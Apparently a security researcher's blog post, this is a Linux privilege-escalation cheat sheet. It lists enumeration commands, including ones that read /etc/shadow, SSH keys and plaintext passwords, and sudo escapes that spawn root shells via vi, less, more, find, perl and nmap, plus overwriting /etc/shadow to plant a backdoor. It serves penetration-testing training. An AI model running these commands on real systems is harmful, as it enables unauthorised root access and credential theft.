Privilege Escalation +Videos

Windows Privilege Escalation

I just watched this one and I found it to be very refreshing. 😉 ^^!privesc/windows/

 Linux Privilege Escalation

Binary exploits should be a last resort (Use more stable methods when available)

Some priv escalation is waiting game – Writing a file to a cron.d directory (must wait for reboot)

System/User Info –

uname -a, env, whoami, history, pwd

Distribution info: /etc/release – /etc/issue*

Ptrace exploits:

Look for web servers, mail servers (command inject gives you root?)

*Binary exploits of root less dangerous than kernel; even if service crashes machine doesn’t and the service will probably autostart

Run ltrace command against any setuid and setgid programs found.

Look for setuid programs with: find directory -user root -perm -4000 -exec ls -ld {};>/tmp/gaping-security-hole

Cronsjobs, weak permissions on scripts

-Always check both world writable and user writable scripts.

Weak permissions on binaries

User writable permissions on binaries are less common than scripts

Weak permissions on LD_PRELOAD

LD_PRELOAD is ignored for setuid programs

If permissions are poorly set for an installations lib directory there may be exploitation opportunity.

Who else has logged in?

who, w, last

Are you in the sudoers file?

sudo -l, cat /etc/sudoers

*Users with restricted sudo access can use it to obtain unrestricted root permissions*

setuid/setgid obscure text editors with setuid bit set could be potential backdoor.

Other super users?

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'

Network Info

ifconfig -a, netstat -antup, lsof -i

Vulnerable OS?

Get kernel version from- uname -a
Use searchsploit to search exploitdb for local privesc exploits searchsploit kernel 2.6 linux | sort -n


Enumerate services/software

ps aux, ps -ef

Look for services running as a privileged user

List versions of installed software

dpkg -l, rpm -qa, httpd -v, mysql --version, python --version, ruby -v

determine versions then searchsploit again

SUID Files?

find / -perm -u=s -type f 2>/dev/null

Password hashes?

cat /etc/shadow

Any files that you can overwrite to get root?

Check jobs / Tasks?

ls -la /etc/cron*

SSH Keys

ls -la ~/.ssh/  (check other user’s dirs too)

Look for clear text creds in files for various scripts, DB’s, config files.

find . -type f -maxdepth 4 | xargs grep -i “passsword”


Linux Privesc Scripts –
Unix-privesc-check –
LinEnum –


nmap example:

nmap –interactive


vi example:

sudo vi /etc/shadow

shell (you can run shell in vi)

less example:

sudo less /etc/shadow

v (press v key. drops in editor)

More example:

sudo more /etc/shadow  (any file can be used it just needs to be longer than a page)

? (type ?)

!bash (runs root)

SUDO copy, move, and find:

sudo cp and mv (overwrite and copy /etc/shadow or other files to obtain backdoor.)

sudo find /etc -exec bash -i\;

sudo script interpreters:
sudo perl
exec “/bin/sh”;

Download linux root NOTES 🙂

Author: McPeters Joseph

Joseph McPeters is a Security Researcher. He specializes in network and web application penetration testing. Contact:

Leave a Reply

Your email address will not be published. Required fields are marked *